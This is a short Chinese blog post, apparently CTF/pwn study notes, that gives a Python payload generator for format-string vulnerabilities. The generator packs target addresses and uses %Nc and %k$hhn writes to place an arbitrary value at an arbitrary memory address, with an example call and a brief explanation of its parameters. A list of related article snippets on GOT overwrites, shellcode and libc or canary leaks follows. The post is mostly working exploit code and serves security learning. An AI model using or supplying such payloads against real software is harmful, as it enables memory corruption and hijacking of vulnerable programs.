格式化字符串漏洞写入大地址函数

最新推荐文章于 2024-08-04 22:46:45 发布
最新推荐文章于 2024-08-04 22:46:45 发布
阅读量537 收藏 2
点赞数
分类专栏: 日志 资料 文章标签: 日志 网络安全 二进制 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RobinZZX/article/details/94722072
版权 
def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr


def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
payload = fmt_str(6,4,0x0804A028,0x12345678)

其中每个参数的含义基本如下

offset 表示要覆盖的地址最初的偏移
size 表示机器字长
addr 表示将要覆盖的地址。
target 表示我们要覆盖为的目的变量值。

RobinZZX
关注
专栏目录
【分析】利用格式化串覆盖*printf()系列函数本身的返回地址
FreeXploiT
03-29 2063
利用格式化串覆盖*printf()系列函数本身的返回地址创建时间:2001-10-29文章属性:原创文章来源:http://www.xfocus.org/文章提交:alert7 (sztcww_at_sina.com)利用格式化串覆盖*printf()系列函数本身的返回地址作者:alert7                      alert7@xfocus.org             >主
格式化字符串漏洞
最新发布
qq_67812668的博客
08-13 896
格式化字符串是一种很常见的漏洞,其产生根源是printf函数设计的缺陷,即printf()函数并不能确定数据参数arg1,arg2…究竟在什么地方结束,也就是说,它不知道参数的个数。它只会根据format中的打印格式的数目依次打印堆栈中参数format后面地址的内容 格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。
利用格式化字符串漏洞实现任意地址读写
个人笔记
06-01 4050
理解格式化字符串漏洞关键还是在于理解栈空间布局,任意地址写初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 479
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
格式化字符串漏洞利用 三、格式化字符串漏洞
热门推荐
龙哥盟
04-14 4万+
三、格式化字符串漏洞 原文:Exploiting Format String Vulnerabilities 作者:scut@team-teso.net 译者:飞龙 日期:2001.9.1 版本:v1.2 格式化字符串漏洞的通常分类是“通道问题”。如果二类不同的信息通道混合为一个,并且特殊的转义字符或序列用于分辨当前哪个通道是激活的,这一类型的漏洞就可能出
格式化字符串漏洞大数溢出(攻防世界实时数据检测write_up)
qq_35066257的博客
04-14 674
大数溢出: 就是当你发现了格式化字符串漏洞时,想要向目标地址 写入较大的数,这样使用"%num$n"就没办法达成目标,这样就需要另外两个格式化字符。 下面以XCTF的实时数据检测为例子: 第一步用checksec查看保护,和位数: 第二步用ida查看漏洞: 发现存在格式化字符串漏洞,并且当key的值为“35795746”时渗透成功 查看key地址,由于我们需要设置key的值为3579574...
格式化写入字符串_labview_
09-30
对于格式化写入,我们需要关注“格式化字符串”(Format String)函数,它可以将数值或其他数据类型转换为格式化字符串。 3. **格式化字符串语法**:在LabVIEW中,可以使用类似C语言的printf格式来构造格式化字符...
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
- **漏洞利用**: 攻击者可以通过构造包含特定格式化字符串输入来控制程序的行为,例如覆盖内存中的值或直接调用程序中的函数。 ##### 2. 利用实例 下面是一个简单的示例,展示如何利用格式化字符串漏洞来打印...
格式化字符串漏洞1
08-04
格式化字符串漏洞】是一种常见的安全问题,常见于C语言编程环境,特别是在使用`printf`和`scanf`家族函数时。这种漏洞发生的原因是程序在处理格式化字符串时,允许外部输入来控制输出或者错误地处理了参数类型,...
格式化字符串漏洞执行任意代码分析
小强的博客
10-10 3624
首先使用vc++6.0编译一个程序FormatStr.exe,源代码: 代码: _#include  #include  int main (int argc, char *argv[]) {     char buff[1024];  // 设置栈空间         strncpy(buff,argv[1],sizeof(buff)-1);         printf(buff)
复旦大学_软件安全_SEED labs_6-Format_String_Server.zip
06-27
复旦大学_软件安全_SEED labs_6-Format_String_Server实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
[CTF]-PWN格式化字符串漏洞题综合解析
2301_79326813的博客
08-04 1185
格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
软件安全实验——lab4(格式化字符串2:修改内存地址运行shellcode获取root权限)
Onlyone_1314的博客
07-21 1126
目录标题一、获得环境变量的程序和攻击的程序的文件名长度不一样(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)查找exit函数地址(4)1、用%x找到printf()中参数在栈中的位置是11(5)将exit函数地址修改为shellcode的地址二、令两个程序的文件名长度相等(推荐)(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)攻击三、Root权限开启alsr:sudo sysctl -w kernel.randomize
泄露libc
inquisiter
01-12 1550
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 506
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
格式化字符串任意地址写入函数指针执行shellcode——攻防世界string复现及知识点简述
独沐晨霖
08-24 1156
文章目录原题复现——攻防世界string漏洞分析攻击思路exp要注意的小细节 原题复现——攻防世界string 漏洞分析 题目去除了符号表,简单分析即可还原函数功能,用ida改名即可 先进行基础检查,是64位程序,未开启PIE main函数中会给出v3[0]和v3[1]的地址 游戏开始需要输入角色名称,无利用点 go_east函数,没有可以利用的地方,必须输east才能继续游戏 许愿函数,读入用户输入地址以及format,可以结合main函数给我们的地址进行任意地址写利用 .
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6621
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
利用格式化字符串漏洞泄露Canary机制及其绕过策略
具体操作是在printf函数格式化字符串漏洞点下断点,输入特定的字符序列后,分析栈内存以确定字符串偏移量,进而计算Canary的偏移地址。例如,通过输入`AAAAAAAAAA`,分析ESP寄存器的值和字符串起始位置,得知格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值